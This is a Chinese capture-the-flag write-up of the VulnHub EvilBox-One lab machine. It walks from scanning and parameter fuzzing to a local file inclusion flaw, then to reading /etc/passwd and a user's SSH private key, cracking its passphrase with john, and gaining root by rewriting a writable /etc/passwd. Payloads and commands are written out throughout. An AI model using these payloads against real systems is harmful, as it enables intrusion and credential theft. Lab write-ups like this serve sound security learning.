vulnhub打靶日记:接口和传参的信息收集技巧

admin 2023年7月22日17:31:52评论33 views字数 2812阅读9分22秒阅读模式

获网安教程

免费&进群

vulnhub打靶日记:接口和传参的信息收集技巧

本文由掌控安全学院-山雀7投稿

靶机:https://download.vulnhub.com/evilbox/EvilBox---One.ova
攻击机:kali2022.2
目标:两个flag,root权限
没错,鸽了好久我又来了,主要这次在边界突破卡的有点久

总结

主机发现(新方法fping)
端口扫描、服务探测
路径爆破(用过的dirsearch,gobuster,个人感觉gobuster更快)
参数爆破(下载了新字典集seclists,新工具fuff)
web渗透(模糊测试文件包含漏洞,新知识php封装器)
ssh爆破(探测ssh认证方式,ssh公私钥默认位置,新工具john)
提权(新知识find搜索suid权限文件,搜索可写权限的文件)
想了想把总结写到前面,这样小伙伴们可以看看有没有感兴趣的知识,之前放到最后感觉看到最后的人很少哇

边界突破

信息收集

主机发现

fping -gaq 10.0.3.0/24

vulnhub打靶日记:接口和传参的信息收集技巧

靶机ip:10.0.3.11

端口扫描,服务探测

nmap -p- 10.0.3.11
nmap -p22,80 -A 10.0.3.11

vulnhub打靶日记:接口和传参的信息收集技巧

22:ssh (ssh暴力破解)
80:apache
linux4.15-5.6

web渗透

vulnhub打靶日记:接口和传参的信息收集技巧

根目录动不了手脚

目录扫描

gobuster dir -u htttp://10.0.3.11 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
发现/secret,/index.html

vulnhub打靶日记:接口和传参的信息收集技巧

空白页面,查看源码也是空白,继续扫描
gobuster dir -u htttp://10.0.3.11/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
发现/evil.php

vulnhub打靶日记:接口和传参的信息收集技巧

依旧空空如也,可能是只有目录没有参数。

参数爆破


  1. ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -w value.txt:VAL -u http://10.0.3.11/secret/evil.php?PARAM=VAL -fs 0

-w指定字典,第一个是PARAM参数的意思,字典来自burp的专业版,kali可以通过apt-get install seclists来下载seclists里面有很多的字典可用
第二个字典是参数的值,value.txt是我自己写的,在前面的打靶里说过,可以把键盘上所有能敲的字符做一个字典,来尝试让页面报错。-fs 0 是过滤掉回显空白的页面。
当然小伙伴们也可以用burp的爆破模块来做。

vulnhub打靶日记:接口和传参的信息收集技巧
并没有发现。试试有没有文件包含漏洞,让字典里的所有参数的值等于一个确定已经有的文件。前面发现了index.php是确定有的。
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.0.3.11/secret/evil.php?FUZZ=../index.html -fs 0
发现command参数可用。
vulnhub打靶日记:接口和传参的信息收集技巧
确认漏洞
?command=../../../../../../../etc/passwd/
先跳出到根目录,在访问/etc/passwd
vulnhub打靶日记:接口和传参的信息收集技巧
注意这个一看就不像是程序账户的用户mowree,后面要用
确认了有文件包含和任意文件读取漏洞。然后我写了一句话尝试了远程包含失败了,应该是只能本地包含。

php封装器写入文件尝试

?command=php://filter/convert.base64-encode/resource=evil.php
可以读取evil.php的源码然后通过base64加密返回。

vulnhub打靶日记:接口和传参的信息收集技巧
解码


  1. <?php
  2. $filename = $_GET['command'];
  3. include($filename);
  4. ?>

如果不声明的话filter封装器默认是用read,也可以用wirte写入文件。只要有写入权限就webshell了。
?command=php://filter/write=convert.base64-decode/resource=test.php&txt=c2hhbnF1ZQo=

vulnhub打靶日记:接口和传参的信息收集技巧

ssh爆破

先探测ssh登陆的认证过程
ssh [email protected] -v

vulnhub打靶日记:接口和传参的信息收集技巧

支持ssh公钥登陆。思路明确了,用文件包含去读取默认的ssh公私钥。
?command=../../../../../home/mowree/.ssh/authorized_keys

vulnhub打靶日记:接口和传参的信息收集技巧

?command=../../../../../home/mowree/.ssh/id_rsa
在源码中查看私钥会比较友好,不然页面上真是乱的。。。。

vulnhub打靶日记:接口和传参的信息收集技巧

创建id_rsa,把获取到的私钥丢进去,给权限。ssh 对目录的权限有要求,代码中要设置下新生成的config文件权限才行。
~目录权限是750,~/.ssh 的是700, ~/.ssh/* 的是600,~/.ssh/config 是700


  1. vi id_rsa
  2. chmod 600 id_rsa
  3. ssh mowree@10.0.3.11 -i id_rsa

vulnhub打靶日记:接口和传参的信息收集技巧
私钥文件还有一个密码,我tm直接好家伙。
爆破密码
用到kali自带工具john,先要转换私钥的格式才能用这个工具爆破


  1. cd /usr/share/john
  2. ls ssh2john.py
  3. ./ssh2john.py ~/id_rsa > ~/hash

john hash --wordlist=rockyou.txt

vulnhub打靶日记:接口和传参的信息收集技巧

私钥文件的加密密码为unicorn

vulnhub打靶日记:接口和传参的信息收集技巧

至此成功突破边界。

内网渗透

vulnhub打靶日记:接口和传参的信息收集技巧

第一个flag:56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

提权

sudo -l,内核漏洞,计划任务提权失败后,尝试suid提权
搜索具有suid权限位的文件
find / -perm /4000 2>dev/null

vulnhub打靶日记:接口和传参的信息收集技巧

并没有漏洞发现。

查看有没有自己写的有root权限的脚本,我们可以去编辑的
find / -writable 2>/dev/null

vulnhub打靶日记:接口和传参的信息收集技巧

居多/proc的,这是个内存映像目录,没用,把它过滤掉
find / -wirtable 2>/dev/null | grep -v proc

vulnhub打靶日记:接口和传参的信息收集技巧

???这不给tmROOT密码改了
生成一个密码shanque
openssl passwd -l

vulnhub打靶日记:接口和传参的信息收集技巧

把生成的密文贴到/etc/passwd里面,把root后面的代表密码的x删了。

vulnhub打靶日记:接口和传参的信息收集技巧

flag2:36QtXfdJWvdC0VavlPIApUbDlqTsBM

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

vulnhub打靶日记:接口和传参的信息收集技巧

原文始发于微信公众号(掌控安全EDU):vulnhub打靶日记:接口和传参的信息收集技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月22日17:31:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub打靶日记:接口和传参的信息收集技巧http://cn-sec.com/archives/1899134.html

发表评论

匿名网友 填写信息